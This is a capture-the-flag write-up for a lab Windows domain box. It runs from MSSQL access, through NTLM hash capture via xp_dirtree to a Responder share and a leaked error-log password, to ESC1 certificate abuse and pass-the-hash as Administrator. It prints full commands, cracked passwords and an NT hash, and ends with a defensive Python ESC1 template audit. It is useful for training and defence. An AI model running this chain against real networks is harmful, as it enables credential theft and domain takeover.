Shell as sql_svc
Anonymous SMB access is enabled
Using Impacket we can sign into the MSSQL server with the PublicUser account:
impacket-mssqlclient sequel.htb/PublicUser:[email protected]
With Responder listening on tun0, the xp_dirtree call below makes the SQL Server service account reach out to our SMB share, and Responder captures its NTLMv2 hash:
sudo responder -I tun0
EXEC xp_dirtree '\\10.10.14.2\share'
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:7631d77ef1809e8e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
The hash cracks to REGGIE1234ronnie:
sql_svc:REGGIE1234ronnie
We have no user flag as sql_svc, though, so we need to pivot to Ryan.Cooper's account.
Shell as Ryan Cooper
We can find creds in the MSSQL error log: Ryan accidentally typed his password into the username field of a login attempt, so it was written to the log as a failed login for that "user".
C:\SQLServer\Logs> type ErrorLog.bak
ryan.cooper:NuclearMosquito3
Privilege escalation to admin
Using Certipy we can get the Administrator's TGT and NT hash.
Tool is here - https://github.com/ly4k/Certipy
Guide is here - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
Also this was useful - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
The first step was uploading Certify.exe to the box and running it to find vulnerable certificate templates. The important values we need (the CA name and the template name) were highlighted in red in the output.
.\certify.exe find /vulnerable
Using the highlighted values we can request a certificate for the Administrator account; the output is a private key plus certificate, which becomes our cert.pem file:
.\certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
We then copy that key and certificate to our machine, save them as cert.pem, and use the command below to turn the file into a pfx:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Kerberos rejects requests when clocks are out of sync, and my clock differed from the machine's, so we have to use ntpdate to make our times match up:
ntpdate 10.10.11.202
Now that the certificate is in the proper format and our clock matches, we can use Certipy to get the TGT and NT hash:
python3 entry.py auth -pfx 'cert.pfx' -username 'Administrator' -domain 'sequel.htb' -dc-ip 10.10.11.202
I spent a while trying to crack the NTLM hash or use a pass-the-hash tool but kept getting errors. Like usual, I overcomplicated things a ton. We can just pass the hash with evil-winrm:
evil-winrm -i 10.10.11.202 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
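As an added example (not part of the writeup, and not Certify's or Certipy's code), here is the template-level check a defender would run to find the ESC1 misconfiguration that `certify find /vulnerable` flagged above: a template that lets the enrollee supply the subject, carries an authentication EKU, needs no approval or co-signature, and is enrollable by low-privileged principals. The template attribute values in the samples are constructed for illustration, not the real sequel.htb template's settings, and the `enrollment_rights` list stands in for the template's security descriptor.

```python
# Added example (not the writeup's code): a template-level audit for the ESC1
# misconfiguration that `certify find /vulnerable` reports. Attribute values in
# the samples are CONSTRUCTED for illustration, not the real sequel.htb settings.

# Well-known AD CS bit flags and EKU OIDs (MS-CRTD / RFC 5280)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_reasons(t: dict) -> list:
    """One reason per ESC1 precondition the template meets; [] as soon as
    any precondition fails (then the template is not ESC1)."""
    checks = [
        (t.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
         "enrollee supplies subject, so the requester picks the SAN"),
        (set(t.get("pKIExtendedKeyUsage", [])) & AUTH_EKUS,
         "EKU permits domain authentication (PKINIT)"),
        (not t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS,
         "manager approval not required"),
        (t.get("msPKI-RA-Signature", 0) == 0,
         "no authorized signature required"),
        (LOW_PRIV & set(t.get("enrollment_rights", [])),
         "low-privileged principals may enroll"),
    ]
    reasons = []
    for ok, why in checks:
        if not ok:
            return []
        reasons.append(why)
    return reasons


# Constructed samples: a template shaped like the one Certify flagged, and a
# hardened copy that no longer lets the enrollee supply the subject.
SAMPLE_TEMPLATE = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["Domain Users"],
}
HARDENED_TEMPLATE = dict(SAMPLE_TEMPLATE, **{"msPKI-Certificate-Name-Flag": 0})
```

Clearing the enrollee-supplies-subject flag, requiring manager approval, or restricting enrollment rights each on its own takes the template out of the ESC1 set; CA-level enrollment rights are a separate check not modelled here.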